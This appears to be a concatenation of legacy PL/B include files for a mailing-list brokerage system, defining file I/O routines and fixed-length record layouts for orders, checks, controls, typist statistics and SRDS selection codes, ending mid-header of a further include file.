         FILEPI  1;LIncFILE
         UPDATE  LIncFList;LIncVARS
         TRAPCLR IO
         RETURN
..............................................................................
.
. ENTRY POINT : LIncDEL
. REQUIRED : 'LIncFLD'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.
. Delete by exact ISAM key (header says key is in LIncFLD); note the
. DELETE statement itself names only the filelist.
LIncDEL  BRANCH  LIncFLAG TO LInc7
         CALL    LIncOPEN
LInc7    TRAP    IOMSSG GIVING ERROR IF IO
         FILEPI  1;LIncFILE
         DELETE  LIncFList
         TRAPCLR IO
         RETURN
...............................................................................
..............................................................................
.
. ENTRY POINT : LIncOPEN
. REQUIRED : 'LIncFLAG'
. RETURNED : 'LIncFLAG' SET TO '1' IF OPENNED
. DESCRIPTION : OPEN FILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
. Open the income-report file and mark it open (LIncFLAG = 1).
. If the OPEN raises an I/O error the trap transfers to LIncGONE,
. which hands the file name to the shared FILEGONE routine; per the
. header that displays an error and aborts when the file is off-line.
LIncOPEN TRAP    LIncGONE IF IO
.
LIncOP
         OPEN    LIncFLIst
         TRAPCLR IO
         MOVE    C1 TO LIncFLAG
         RETURN
..............................................................................
LIncGONE MOVE    LIncNAME TO FILENAME
         CALL    FILEGONE
.
..............................................................................
<file_sep>/include/NTYPDD.INC
* NTYPDD/INC.
* *****************************************************************************
* NAMES IN THE NEWS MASTER TYPIST ANALYSIS FILE.
* *****************************************************************************
.
. FILE: TYPOUT
. LENGTH: 83
.COMPRESS: NONE
. TYPE: ISAM
. KEY: 9 bytes date ccyymm & TYPist
...............................................................................
.RElease 2.41 Add counters for prog34, prog 9 (combined) record bumped to 110 bytes
.RElease 2.4 changed type to NtypType DLH 22 March 2010
.Release 2.0 March 2006 combine to single records types, add new counters
NTYPNAME INIT "TYPOUT "
.begin patch 2.0
.NTYPFILE IFILE KEYLEN=3,FIX=55,UNCOMP
.NTYPFILE IFILE KEYLEN=9,FIX=83,UNCOMP
NTYPFILE IFILE KEYLEN=9,FIX=110,UNCOMP
.NTYPFLD DIM 3
NTYPFLD DIM 9
.end patch 2.0
NTYPPATH FORM 1
NTYPFLAG FORM 1
.
.begin patch 2.0
.
.** RECORD TYPE 1 TOTAL **
.
.NtypTot List
.;IDNUM DIM 5 1-5 ALWAYS 99
.IDNUM DIM 9 1-9 ALWAYS 'ccyymm99 '
.STotal FORM 5 10-14 # OF NEW ORDERS
.RTotal FORM 5 15-19 # REPRINT ORDERS
.QtyTotal Form 9 20-28 Total qty
.LCSTot FORM 5 29-33 # OF NEW LCRS
.LCRTot FORM 5 34-38 # REPRINT LCRS
.INVTOT FORM 5 39-43 #NEW INVOICES
.INVRTOT FORM 5 44-48 #REPRINT INVOICES
.CORTOTAL FORM 5 49-53 #NEW CORRECTIONS
.CANTOTAL FORM 5 54-58 #NEW CANCELATIONS
.APPTOT FORM 5 59-63 #NEW APPROVALS
.ADJTOT Form 5 64-68 #of new Adjustments
.PndTot Form 5 69-73 # pending prders
.lstTot FOrm 5 74-78 # of new datacards
.LStUTot Form 5 79-83 # updated datacards
.;SCOUNT FORM 5 6-10 # OF NEW ORDERS
.;RCOUNT FORM 5 11-15 # REPRINT ORDERS
.;LCSCOUNT FORM 5 16-20 # OF NEW LCRS
.;LCRCOUNT FORM 5 21-25 # REPRINT LCRS
.;INVTOT FORM 5 26-30 #NEW INVOICES
.;INVRTOT FORM 5 31-35 #REPRINT INVOICES
.;CORTOTAL FORM 5 36-40 #NEW CORRECTIONS
.;CANTOTAL FORM 5 41-45 #NEW CANCELATIONS
.;APPTOT FORM 5 46-50 #NEW APPROVALS
.;ADJTOT Form 5 51-55 #of new Adjustments
. ListEnd
.
.** RECORD TYPE 2 DETAIL **
.
NtypDet List
TypDate Dim 6 1-6 CCYYMM
NtypTYPE DIM 3 7-9 TYPISTS INITIALS
.TYPE DIM 5 1-5 TYPISTS INITIALS
SUBCOUNT FORM 5 10-14 # NEW ORDERS
REPCOUNT FORM 5 15-19 # REPRINT ORDERS
SUBQTY FORM 9 20-28 # OF NAMES
LSUBCNT FORM 5 29-33 # NEW LCRS
LREPCNT FORM 5 34-38 # REPRINT LCRS
INVCOUNT FORM 5 39-43 # NEW INVOICES
INVRCNT FORM 5 44-48 # REPRINT INVOICES
CORCOUNT FORM 5 49-53 # NEW CORRECTIONS
CANCOUNT FORM 5 54-58 # NEW CANCELLATIONS
.APPCOUNT FORM 5 59-63 # NEW APPROVALS
PndUCount FOrm 5 59-63 #of PEnding Updates 2013 October 3
ADJCount Form 5 64-68 #of new Adjustments
PndCOunt Form 5 69-73 # of New pending
lstCount FOrm 5 74-78 # of new datacards
LStUCOunt Form 5 79-83 # updated datacards
. adds
DBCount Form 5 84-88 # new database records from prog 34 and prog 9 and 15?
DBUcount Form 5 89-93 # Updated database records from prog 34 and prog 9 and 15?
NtypFill dim 17 94-110 .fill
...
.SUBCOUNT FORM 4 6-9 # NEW ORDERS
.REPCOUNT FORM 4 10-13 # REPRINT ORDERS
.SUBQTY FORM 9 14-22 # OF NAMES
.LSUBCNT FORM 4 23-26 # NEW LCRS
.LREPCNT FORM 4 27-30 # REPRINT LCRS
.INVCOUNT FORM 4 31-34 # NEW INVOICES
.INVRCNT FORM 4 35-38 # REPRINT INVOICES
.CORCOUNT FORM 4 39-42 # NEW CORRECTIONS
.CANCOUNT FORM 4 43-46 # NEW CANCELLATIONS
.APPCOUNT FORM 4 47-50 # NEW APPROVALS
.ADJCount Form 5 51-55 #of new Adjustments
Listend
.
.end patch 2.0
<file_sep>/include/SRDSSLTdd.inc
******************************************************
* SRDSSLTDD INCLUSION
* SUBSIDIARY FILE FOR DATACARD
* ADDRESSING FILE DESCRIPTOR.
. ....................................................
* ****************************************************
* NAMES IN THE NEWS SRDS FILE.
* ****************************************************
.
. FILE: NISRDSSLT
. LENGTH: 51
. TYPE: ISAM,MANAGED
. INDEX KEY: 1-6 SRDSSLTLIST
......................................................
SRDSSLTNAME INIT "SRDS_SLT.ISI|NINS1:502"
SRDSSLTFLIST FILELIST
SRDSSLTFILE IFILE KEYLEN=6,FIXED=51,Name="SRDS_SLT.isi|NINS1:502"
FILELISTEND
.>Patch 1.1 End
.
SRDSSLTLOCK FORM 1 0 OR 1=filepi,2=recordlock, 3=no lock
SRDSSLTFLD DIM 6
SRDSSLTFLD1 DIM 9
SRDSSLTFLAG FORM 1
SRDSSLTPATH FORM 1
.
SRDSSLTVARS LIST
SRDSSLTLIST  DIM 6     1-6   LIST NUMBER
SRDSSLTTYPE  DIM 1     7-7   if Known record type ADDRESS/Select/Arrangement/source
SRDSSLTNUM   DIM 3     8-10  NIN ADDRESS/Select/Arrangement/source CODE NUMBER
.                            (position comment corrected from "9-10": a 3-byte
.                            field following byte 7 occupies 8-10, confirmed by
.                            SRDSSLTPRICE at 11-18 and the 51-byte record length)
SRDSSLTPRICE FORM 5.2  11-18 SELECTION CODE PRICE
SRDSSLTDESC  DIM 3     19-21 SELECTION CODE DESCRIPTION
.                      " " OR "000" NO DESCRIPTION/CALCULATION
.                      "001" /M
.                      "002" /FLAT
.                      "003" /EACH
.                      "004" /MIN
.                      "005" N/A
.                      "006" N/C
.                      "007" SEEBASE
.                      "008" SEEDESC
.                      "009" INQUIRE
SRDSSLTDES   Dim 30    22-51 .description from SRDS XML File
    LISTEND
<file_sep>/include/norddd104.inc
..............................................................................
.
. NORDDD INCLUSION
. NIN ORDER FILE DEFINITION
.
. FILE NAME : NINORD
. REC LENGTH: 408 FIXED .WAS 294
. INDEX KEY : (1) 7-12 (LR#)
. (2)303-306,7-12 broker/consultant#+lr#
.AIMDEX KEYS: (1) 3-6 (MAILER#)
. (2) 16-21 (LIST#)
. (3) 26-37 (PO#)
. (4) 303-306 (broker/consultant#)
.START PATCH 19 ADDED LOGIC
. (5) 22-25 (LIST OWNER)
. (6) 52-63 (MAILER KEY)
. (7) 198-199 (CONTACT)
.END PATCH 19 ADDED LOGIC
.............................................................................
.###################################### NOTE ordprint uses these vars and is still hardwired in nordtest.pls
.######################################
.######################################
.######################################
.######################################
.#####DLH added nordfld5 aim key by lr for ninprint - AH stuff allow delete by lr
.misc notes regarding future record format changes:
.add a second contact (nin) field (shipping contact) not a required field
.allow for larger client nane 25-> 45
.expand shipping code from 1 to 2 bytes & add in house transfer (change to file?)
.Y2 in ccyymmdd format for all dates
.allow for Pending order status and be able to track NEVER Approved.
.allow for second contact shipping Info Contact (not required)
.expand media to 2 bytes
.expand quantity fields to 9 bytes
.review other fields for expansion
........................................................................
.
. Patch 21.1 DLH 09Jan2006 Company code "P" for Pacific Lists
. Patch 21 DLH 12September2006 add OFulFIll 6 byte Fulfillment company#
. PATCH 20 DMBASH 18JUN2005 Change IP Address of File Manager
. PATCH 19 ASH 02MAY2003 ADDED NEW AAMDICES FOR NEW SHIPPING PROGRAM
. PATCH 18 ASH 19MAR01 MOVED NINORD TO FILE MANAGER
. PATCH 17 ASH 15SEP00 Added Net Quantity
. PATCH 16 ASH 11MAY00 Added new key value - associated Campaign
. PATCH 15 ASH 19APR00 Added new var - associated Campaign
. PATCH 13 ASH 29Nov99 Added new var to determine if Rental
. PATCH 12 ASH ??????? Added new var
. PATCH 11 ASH 04May99 Added Exchange Price var
. patch 10 ASH 23Dec98 file conversion with Y2K expansion
. patch 5 DLH 28Sep98 add new ostat & cancodes for Pending orders
.30Mar98 DLH add code for Multiple locking modes
.23may95 DLH change unused obrkcode to obildrct - to track direct billing
.17oct94 DLh proposed change adding net info expand record to 294.
.15jul93 dlh add sample code, expand mlr PO from 7 to 12, put sales numbers.
. together were 165 & 246 now 170-171 expand typist inits to 3.
.new record size = 278
.23APR93 DLH PREP WORK ADD BROKER/CONSULTANT FIELDS, RECORD SIZE WILL BE 269.
.21OCT92 DLH ELIMINATE OBLANK ADDED OBRKCODE, OBRKGUAR.
..............................................................................
.
NORDNAME DIM 30
.START PATCH 18 REPLACED LOGIC
.NORDNME1 INIT "NINORD"
.NORDNME2 INIT "NINORD"
.nordnme3 init "NINORDB"
..START PATCH 16 ADDED LOGIC
.nordnme4 init "NINORDC"
..END PATCH 16 ADDED LOGIC
.>START PATCH 20 CHANGED IP ADDRESS
.NORDNME1 INIT "NINORD.ISI|20.20.30.104:502"
NORDNME1 INIT "NINORD.ISI|10.10.30.104:502"
.NORDNME2 INIT "NINORD.AAM|20.20.30.104:502"
NORDNME2 INIT "NINORD.AAM|10.10.30.104:502"
nordnme3 init "NINORDB"
.nordnme4 init "NINORDC.ISI|20.20.30.104:502"
nordnme4 init "NINORDC.ISI|10.10.30.104:502"
.>END PATCH 20 CHANGED IP ADDRESS
.END PATCH 18 REPLACED LOGIC
NORDFILE IFILE KEYLEN=6,FIXED=408,NODUPLICATES
IFNZ PC
NORDFLE2 AFILE FIXED=408
XIF
IFZ PC
.NORDFLE2 AFILE 17,4,,FIXED=294 .pcbus
NORDFLE2 AFILE FIXED=408 .plb
XIF
.NORDFLE3 IFILE KEYLEN=10,FIXED=294
.START PATCH 16 ADDED LOGIC
NORDFLE4 IFILE KEYLEN=6,FIXED=408
.END PATCH 16 ADDED LOGIC
NORDFLD DIM 6
NORDFLD1 DIM 7 nordfle2 AIM KEY 1 MLR
NORDFLD2 DIM 9 nordfle2 AIM KEY 2 LIST
.NORDFLD3 DIM 11 nordfle2 AIM KEY 3 MLRPO
NORDFLD3 DIM 15 nordfle2 AIM KEY 3 MLRPO
nordfld4 dim 7 nordfle2 aim key 4 broker##
nordfld5 DIM 9 .order print file secondary aim key lr
.START PATCH 19 ADDED LOGIC
NORDFLD6 DIM 7 nordfle2 AIM KEY 5 LIST OWNER
NORDFLD7 DIM 15 nordfle2 AIM KEY 6 MAILER KEY
NORDFLD8 DIM 5 nordfle2 AIM KEY 7 CONTACT
.END PATCH 19 ADDED LOGIC
.START PATCH 16 ADDED LOGIC
nordfldC DIM 6 .NORDFLE4 ISAM KEY BASED ON CAMPAIGN NUMBER
.END PATCH 16 ADDED LOGIC
NORDFLAG FORM 1
NORDFLG2 FORM 1
.NORDFLG3 FORM 1
.START PATCH 16 ADDED LOGIC
NORDFLG4 FORM 1
.END PATCH 16 ADDED LOGIC
NORDPATH FORM 1
NORDLOCK FORM 1 0 & 1=FILEPI, 2=REcord lock, 3=no lock
.
ORCODE DIM 1 001-001 ORDER CODE, "S"
OSTAT DIM 1 002-002 STATUS, 0,B,Q,X,p,x,l,z
. 0-Live order
. B-Billed order
. Q-Cancelled/Billed order
. X-Cancelled order
. e-Live Order with Estimated Invoice uses "X" if cancelled
.patch 5 New values for OSTAT p Lower case = Pending order (awaiting LO/manager Approval)
. x Lower case = Cancellation of above (never approved)
. l Lower case = LCR
. z Lower case = Cancellation of LCR
..................................................
.WILL NEED TO BE UPDATED WHEN CLIENT FILE IS FINISHED
OMLRNUM DIM 4 003-006 MAILER NUMBER, AIM KEY 1
..................................................
OLRN DIM 6 007-012 LR NUMBER, KEY
OCOBN DIM 3 013-015 CONTACT # (NIN) OR BROKER # (CMP)
OLNUM DIM 6 016-021 LIST NUMBER, AIM KEY 2
..................................................
.WILL NEED TO BE UPDATED WHEN CLIENT FILE IS FINISHED
OLON DIM 4 022-025 LIST OWNER NUMBER
..................................................
OMLRPON DIM 12 026-037 MAILER PURCHASE ORDER NUMBER was 7
.Start Patch 10 - expand var
.OQTY DIM 7 038-044 QUANTITY, X,XXX,XXX
OQTY DIM 9 038-046 QUANTITY, X,XXX,XXX
.End Patch 10 - expand var
OPPM DIM 5 047-051 PRICE PER THOUSAND, XXX.XX
OMLRKY DIM 12 052-063 MAILER'S KEY
.Start Patch 10 - expand var
.OFOCODE DIM 1 062-062 FURNISHED-ON CODE, 0,1,2,3,4,5,6,7,8,OR 9
OFOCODE DIM 2 064-065 FURNISHED-ON CODE, 0,1,2,3,4,5,6,7,8,OR 9
.end Patch 10 - expand var
.Start Patch 10 - add var and rearrange other date fields
.ORTNDTEM DIM 2 063-064 RETURN DATE (MONTH)
.ORTNDTED DIM 2 065-066 RETURN DATE (DAY)
.ORTNDTEY DIM 2 067-068 RETURN DATE (YEAR)
.OMDTEM DIM 2 069-070 MAIL DATE (MONTH)
.OMDTED DIM 2 071-072 MAIL DATE (DAY)
.OMDTEY DIM 2 073-074 MAIL DATE (YEAR)
ORTNDTEC DIM 2 066-067 RETURN DATE (CENTURY)
ORTNDTEY DIM 2 068-069 RETURN DATE (YEAR)
ORTNDTEM DIM 2 070-071 RETURN DATE (MONTH)
ORTNDTED DIM 2 072-073 RETURN DATE (DAY)
OMDTEC DIM 2 074-075 MAIL DATE (CENTURY)
OMDTEY DIM 2 076-077 MAIL DATE (YEAR)
OMDTEM DIM 2 078-079 MAIL DATE (MONTH)
OMDTED DIM 2 080-081 MAIL DATE (DAY)
.End Patch 10 - add var and rearrange other date fields
OTOCODE DIM 1 082-082 TEST ORDER CODE, "1"
OSOTCODE DIM 1 083-083 SELECTION ON TEST CODE, 1,2 OR 3
OCCODE DIM 1 084-084 CONTINUATION CODE, "1"
OLRNCO DIM 6 085-090 LR NUMBER OF CONTINUATION CODE
.Start Patch 10 - add var and rearrange other date fields
.OODTECOM DIM 2 084-085 ORDER DATE OF CONTINUATION CODE (MONTH)
.OODTECOD DIM 2 086-087 ORDER DATE OF CONTINUATION CODE (DAY)
.OODTECOY DIM 2 088-089 ORDER DATE OF CONTINUATION CODE (YEAR)
OODTECOC DIM 2 091-092 ORDER DATE OF CONTINUATION CODE (CENTURY)
OODTECOY DIM 2 093-094 ORDER DATE OF CONTINUATION CODE (YEAR)
OODTECOM DIM 2 095-096 ORDER DATE OF CONTINUATION CODE (MONTH)
OODTECOD DIM 2 097-098 ORDER DATE OF CONTINUATION CODE (DAY)
.End Patch 10 - add var and rearrange other date fields
.Start Patch 10 - expand var
.OQTYCO DIM 6 090-095 QUANTITY OF CONTINUATION ORDER, XXX,XXX
.OSPI DIM 12 96-107 SPECIAL INSTRUCTION CODES, MAX.6 (2 DIGIT)
OQTYCO DIM 9 099-107 QUANTITY OF CONTINUATION ORDER, XXX,XXX,XXX
OSPI DIM 24 108-131 SPECIAL INSTRUCTION CODES, MAX.6 (2 DIGIT)
.End Patch 10 - expand var
OBildrct DIM 1 132-132 Placed as bill direct? y=yes n=no ' '=no
OBRKGUAR DIM 1 133-133 BROKER GUARANTY, '1' = 30 DAY.
. '2' =45 DAY, '3' =60 DAY, '4' = NO DATE
OELCODE DIM 1 134-134 ENTIRE LIST CODE
. 1=RENT/ENTIRE,2=EXCH,3=EXCHANGE/ENTIRE
OODNUM DIM 7 135-141 OFFER DeSCRIPTION NUMBER
.START PATCH #11 - REPLACED LOGIC WITH ADDED VAR
.OODES DIM 40 142-181 OFFER DESCRIPTION
.START PATCH 15 NEW VAR
.OODES DIM 20 142-161 OFFER DESCRIPTION
.START PATCH 17 NEW VAR
.OODES DIM 14 142-155 OFFER DESCRIPTION
OODES DIM 5 142-146 OFFER DESCRIPTION
ONETQTY DIM 9 147-155 ORDER NET QUANTITY
.END PATCH 17 NEW VAR
OCAMP DIM 6 156-161 ASSOCIATED CAMPAIGN
.END PATCH 15 NEW VAR
.Start Patch #14 - added var
OCLRSTAT DIM 1 162-162 CLEARANCE STATUS 1=EXCHANGE, 2=RENT, 3=EXC/SPLIT, 4=DENIED
OCLRINIT DIM 3 163-165 INITS OF PERSON WHO CLEARED LCR
OBRKRPT DIM 1 166-166 OUTSIDE BROKER NOTIFIED OF CLEARANCE STATUS? 1=YES, B1=NO
OCLRDTEC DIM 2 167-168 CLEAR DATE (CENTURY)
OCLRDTEY DIM 2 169-170 CLEAR DATE (YEAR)
OCLRDTEM DIM 2 171-172 CLEAR DATE (MONTH)
OCLRDTED DIM 2 173-174 CLEAR DATE (DAY)
.End Patch #14 - added var
.Start Patch #13 - added var
ORENT DIM 1 175-175 LCR REQUEST FOR RENT "1" = YES
.End Patch #13 - added var
.Start Patch #12 - added var
OHIST DIM 1 176-176 ORDER HISTORY "l"-LCR to Live, "L"-In-House LCR to Live, "p"-Pending to Live
. IN-HOUSE LCR's: "e"-Waiting for Clearance
. "E"-Cleared
. "*"-Faxed to Owner
. "z"-Denied
.End Patch #12 - added var
OXPPM DIM 5 177-181 EXCHANGE PRICE PER THOUSAND, XXX.XX
.END PATCH #11 - REPLACED LOGIC WITH ADDED VAR
..................................................
.WILL NEED TO BE UPDATED WHEN CLIENT FILE IS FINISHED
ORTNNUM DIM 4 182-185 RETURN-TO NUMBER
..................................................
OTAPERET DIM 1 186-186 TAPE-RETURNABLE ?
.Start Patch 10 - expand var
.OUQTY DIM 7 163-169 UNIVERSE QUANTITY, X,XXX,XXX
OUQTY DIM 9 187-195 UNIVERSE QUANTITY, XXX,XXX,XXX
.End Patch 10 - expand var
OSALES10 DIM 1 196-196 TENS DIGIT OF SALESMAN #.
OSALES DIM 1 197-197 ONES DIGIT OF SALESMAN CODE
.Start Patch 10 - expand var and add var
.OCOCODE DIM 1 172-172 CONTACT CODE, 1,2,3, OR 4
OCOCODE DIM 2 198-199 CONTACT CODE, 1,2,3, OR 4
OCO2CODE DIM 2 200-201 CONTACT CODE, 1,2,3, OR 4
.End Patch 10 - expand var and add var
.Start Patch 10 - add var and rearrange other date fields
.OODTEM DIM 2 173-174 ORDER DATE (MONTH)
.OODTED DIM 2 175-176 ORDER DATE (DAY)
.OODTEY DIM 2 177-178 ORDER DATE (YEAR)
OODTEC DIM 2 202-203 ORDER DATE (CENTURY)
OODTEY DIM 2 204-205 ORDER DATE (YEAR)
OODTEM DIM 2 206-207 ORDER DATE (MONTH)
OODTED DIM 2 208-209 ORDER DATE (DAY)
.End Patch 10 - add var and rearrange other date fields
OSCODE DIM 1 210-210 SAMPLE CODE, 1=sample enclosed,2=sample to follow, OR 3=sample prev approved
OCOMSLCT DIM 1 211-211 overlay: COMSELECT='C', lifestyle="L"
. (LSVCS)
.Start Patch 10 - expand var
.OSHP DIM 1 181-181 SHIPPED VIA CODE, 0,1,2...9.
OSHP DIM 2 212-213 SHIPPED VIA CODE, 0,1,2...9.
.End Patch 10 - expand var
O1DES DIM 35 214-248 LINE #1 OF LIST DESCRIPTION, DATACARD
O2DES DIM 35 249-283 LINE #2 OF LIST DESCRIPTION, KEYIN
OREUSE DIM 6 284-289 RE-USE LR #, RTN-TO # WILL BE '0'
ODOWJ DIM 3 290-292 TYPISTS INITIALS was 2
.Start Patch 10 - expand var
.OEXQTY DIM 7 261-267 EXCHANGE QTY ON SPLIT ORDER.
OEXQTY DIM 9 293-301 EXCHANGE QTY ON SPLIT ORDER.
.End Patch 10 - expand var
GUARCODE DIM 1 302-302 NIN GUARANTY CODE, '1' = 30 DAY.
. '2' =45 DAY, '3' =60 DAY, '4' = NO DATE
. '5' =NOT USED, '6'=REC'D PREPAY,
. '7' REC'D PRE 30-DAY, '8' REC'D PRE 60,
. '9' =REC'D PRE 60 DAY.
..................................................
.WILL NEED TO BE UPDATED WHEN CLIENT FILE IS FINISHED
OBRKNUM DIM 4 303-306 BROKER/CONSULTANT NUMBER.
OBRKCNT DIM 3 307-309 BROKER/CONSULTANT CONTACT NUMBER.
..................................................
osamcde dim 3 310-312 sample numbers
onetper dim 2 313-314 net name percentage (NN = Net Name)
onetrc form 3.2 315-320 net name running charge
onetfm dim 1 321-321 net flag (F)lat'volume', per (M)'net', (N)o
. deducts allowed by Lo.
.
onetmin form 7 322-328 net name minimum.
.begin patch 20
OFullFil Dim 6 329-334 Fullfilment number
.begin patch 21.1
OCompID Dim 1 335-335 Brokerage Company ID 'N' or ' '= NIN 'P' = Pacific lists
OCompID2 Dim 1 336-336 Management Company ID 'N' or ' '= NIN 'P' = Pacific lists
ofiller dim 72 337-408
.ofiller dim 73 336-408
.ofiller dim 74 335-408
.end patch 21.1
.ofiller dim 80 329-408
.end patch 20
* .......................................................................
ORDVARS VARLIST ORCODE:
OSTAT:
OMLRNUM:
OLRN:
OCOBN:
OLNUM:
OLON:
OMLRPON:
OQTY:
OPPM:
OMLRKY:
OFOCODE:
ORTNDTEC:
ORTNDTEY:
ORTNDTEM:
ORTNDTED:
OMDTEC:
OMDTEY:
OMDTEM:
OMDTED:
OTOCODE:
OSOTCODE:
OCCODE:
OLRNCO:
OODTECOC:
OODTECOY:
OODTECOM:
OODTECOD:
OQTYCO:
OSPI:
OBildrct:
OBRKGUAR:
OELCODE:
OODNUM:
OODES:
ONETQTY:
OCAMP:
OCLRSTAT:
OCLRINIT:
OBRKRPT:
OCLRDTEC:
OCLRDTEY:
OCLRDTEM:
OCLRDTED:
ORENT:
OHIST:
OXPPM:
ORTNNUM:
OTAPERET:
OUQTY:
OSALES10:
osales:
OCOCODE:
OCO2CODE:
OODTEC:
OODTEY:
OODTEM:
OODTED:
OSCODE:
OCOMSLCT:
OSHP:
O1DES:
O2DES:
OREUSE:
ODOWJ:
OEXQTY:
GUARCODE:
OBRKNUM:
OBRKCNT:
OSAMCDE:
onetper:
onetrc:
onetfm:
onetmin:
OFullFil:
.begin patch 21.1
OCompID:
OCompID2:
.end patch 21.1
ofiller
<file_sep>/include/nord6dd.inc
......................................
.nord6DD INCLUSION
.NIN supplemental Cancelled LCR FILE DEFINITION
.
.FILE NAME: NInord6
.REC LENGTH: 27 FIXED (header previously said 26; fields total 6+2+8+1+2+8 = 27, matching IFILE FIXED=27)
.INDEX KEY: (1) 1-6 (LR#)
.
. Patch 1.1 Changed IP Address of File Manager DMB 18JUN05
.
.nord6NAME INIT "NINORD6"
.>Patch 1.1 Begin
.nord6NAME INIT "NINORD6.ISI|20.20.30.103:502"
nord6NAME INIT "NINORD6.ISI|NINS1:502"
.>Patch 1.1 End
nord6FILE IFILE KEYLEN=6,FIXED=27
nord6FLD DIM 6
nord6FLAG FORM 1
nord6PATH FORM 1
nord6LOCK FORM 1
.
.
ORD6VARS LIST
nord6LR DIM 6 001-006 ORDER LR
nord6STAT DIM 2 007-008 APPROVAL STATUS
.
.0 OR " " = Cancelled 4 = Cancelled
.1 = Mail Date over 6 months old 5 = Cancelled
.2 = Cancelled 6 = Cancelled
.3 = Cancelled 7 = Cancelled
NORD6PDTE DIM 8 009-016 DATE ENTERED CCYYMMDD
.note actual order date changes to date approved (if approved)
nord6STA1 DIM 1 017-017 OLD OSTAT - "l", "p"
nord6STA2 DIM 2 018-019 CLEARANCE STATUS
.see notes from sales
.Following field was designed to hold date of last change. Now holds date the record was automatically Cancelled,
.if applicable.
nord6CDTE DIM 8 020-027 DATE ENTERED CCYYMMDD
LISTEND
<file_sep>/include/nchkdd.inc
..............................................................................
.
. NCHKDD INCLUSION
.
. FILE NAME : NINCHK.DAT
. REC LENGTH: 110
. INDEX KEY : 1-23 CONTROL NUMBER + CONTROL DATE + CHECK NUMBER
. AAMDEX KEY: 1-11 CONTROL NUMBER/CONTROL DATE
. 12-23 CHECK NUMBER
. 32-46 AMOUNT
. 47-91 PAYOR
..............................................................................
. Patch 1.1 01/10/2005 ASH Added filler for eventual increase of check number
.
NCHKLIST Filelist
.NCHKFILE IFILE KEYLEN=23,FIXED=110,NODUPLICATES
.NCHKFLE2 AFILE FIXED=110
NCHKFILE IFILE NAME="NINCHK.ISI"
NCHKFLE2 AFILE NAME="NINCHK.AAM"
Filelistend
NCHKNAME INIT "NINCHK"
.START PATCH 1.1 REPLACED LOGIC
.NCHKFLD DIM 17
NCHKFLD DIM 23
.END PATCH 1.1 REPLACED LOGIC
NCHKFLD1 DIM 14
.START PATCH 1.1 REPLACED LOGIC
.NCHKFLD2 DIM 9
NCHKFLD2 DIM 15
.END PATCH 1.1 REPLACED LOGIC
NCHKFLD3 DIM 18
NCHKFLD4 DIM 48
NCHKFLAG FORM 1
NCHKlock form 1 0 or 1 - filepi, 2 =record locking, = no locks
..............................................................................
NCHKVARS list
NCHKCONT DIM 3 1-3 CONTROL NUMBER (KEY) (AAMKEY)
NCHKCONTD DIM 8 4-11 CONTROL DATE (AAMKEY)
.START PATCH 1.1 REPLACED LOGIC
.NCHKNUM DIM 6 12-17 CHECK NUMBER (KEY) (AAMKEY)
NCHKNUM DIM 12 12-23 CHECK NUMBER (KEY) (AAMKEY)
.END PATCH 1.1 REPLACED LOGIC
NCHKDATE DIM 8 24-31 CHECK DATE - CCYYMMDD
NCHKAMT FORM 12.2 32-46 CHECK AMOUNT
NCHKPAYOR DIM 45 47-91 CHECK PAYOR
NCHKFILL DIM 19 92-110 FILL
listend
<file_sep>/include/nctrdd.inc
..............................................................................
.
. NCTRDD INCLUSION
.
. FILE NAME : CONTROLS.DAT
. REC LENGTH: 43
. INDEX KEY : 1-11
. AAMDEX KEY : 1-3
.
.PATCH 1.2 DLH INCREASED Record added compid for PLI
.PATCH 1.1 ASH INCREASED ISAM, ADDED AAM
..............................................................................
.
.NCTRFILE IFILE KEYLEN=3,FIXED=42,NODUPLICATES
NCTRLIST Filelist
NCTRFILE IFILE NAME="CONTROLS.ISI|NINS1:502"
NCTRFLE2 AFILE NAME="CONTROLS.AAM|NINS1:502"
Filelistend
NCTRNAME INIT "CONTROLS"
NCTRFLD DIM 11
NCTRFLD1 DIM 6
NCTRFLAG FORM 1
nCTRlock form 1 0 or 1 - filepi, 2 =record locking, = no locks
..............................................................................
NCTRVARS list
NCTRNUM dim 3 1-3 .CONTROL NUMBER (KEY/AAMKEY)
NCTRDATE DIM 8 4-11 .CONTROL DATE - CCYYMMDD (KEY)
NCTRAMT FORM 12.2 12-26 .CONTROL AMOUNT
NCTRCODE FORM 1 27-27 .CONTROL CODE - "1" Edit was run - limited modification
. . "2" Checks were run - no modification at all!!!
NCTRAMT2 FORM 12.2 28-42 .SECONDARY CONTROL AMOUNT
.begin patch 1.2
NCTRCOMP Dim 1 43-43 .COmpany ID "N" or " " = NIN "P" = PLI
.end patch 1.2
listend
<file_sep>/include/CVT.INC
*......................................................................
.
. CVT -- validate CVTFLD as a numeric field, converting a trailing
. minus-overpunch character into a proper negative number: the last
. byte is scanned against MPCHARS; if found it is mapped through the
. MPCHANGE table to a digit and the value negated via NUM10. On a
. format error a message naming LRN is displayed and the routine
. returns without converting. MPCHARS/MPCHANGE/NUM10/LRN are declared
. elsewhere.
CVT      ENDSET  CVTFLD                  CHECK LAST BYTE.
         RESET   MPCHARS
         SCAN    CVTFLD IN MPCHARS       IS IT A MINUSOVRPNCH?
         GOTO    CVTMP IF EQUAL          YES.
         RESET   CVTFLD                  NO.
         TYPE    CVTFLD                  CHECK NUMERIC VALIDITY.
         RETURN  IF EQUAL                ITS OK.
FORMERR  DISPLAY *P1:23,*EL,*B,"FORMAT ERROR READING LR: ",LRN
         RETURN                          POP THE STACK.
CVTMP    REPLACE MPCHANGE IN CVTFLD      CHANGE MP TO NUMBER.
         RESET   CVTFLD
         TYPE    CVTFLD                  VALID NUMERIC?
         GOTO    FORMERR IF NOT EQUAL    NO.
         MOVE    CVTFLD TO NUM10         MOVE INTO NUMERIC.
         MULTIPLY "-1" BY NUM10          CHANGE TO MINUS.
         MOVE    NUM10 TO CVTFLD         MOVE BACK TO DIM.
         RETURN
*.........................
<file_sep>/include/nguadd.inc
..............................................................................
.
. NGUADD INCLUSION
. NIN GUARANTY FILE DEFINITION
.
. FILE NAME : NINGUAR
. REC LENGTH: 14 FIXED
. INDEX KEY : 1-6 (List order number)
..09sep2000 New
..............................................................................
.
NGUAFILE IFILE KEYLEN=6
NGUANAME INIT "NINGUAR"
NGUAFLD DIM 6
NGUAFLG1 FORM 1
.
GUAvars list
GUALR DIM 6 001-006 LIST rental ORDER number
GUADate DIM 8 007-014 Date CCYYMMDD
listend
..............................................................................*
<file_sep>/include/NCRCDD.INC
.**************************************************************************************************************************************************************
.* NCRCDD.INC - VARIABLE INCLUDE FOR NINORD3 - CORRECTION/CANCELATION FILE.
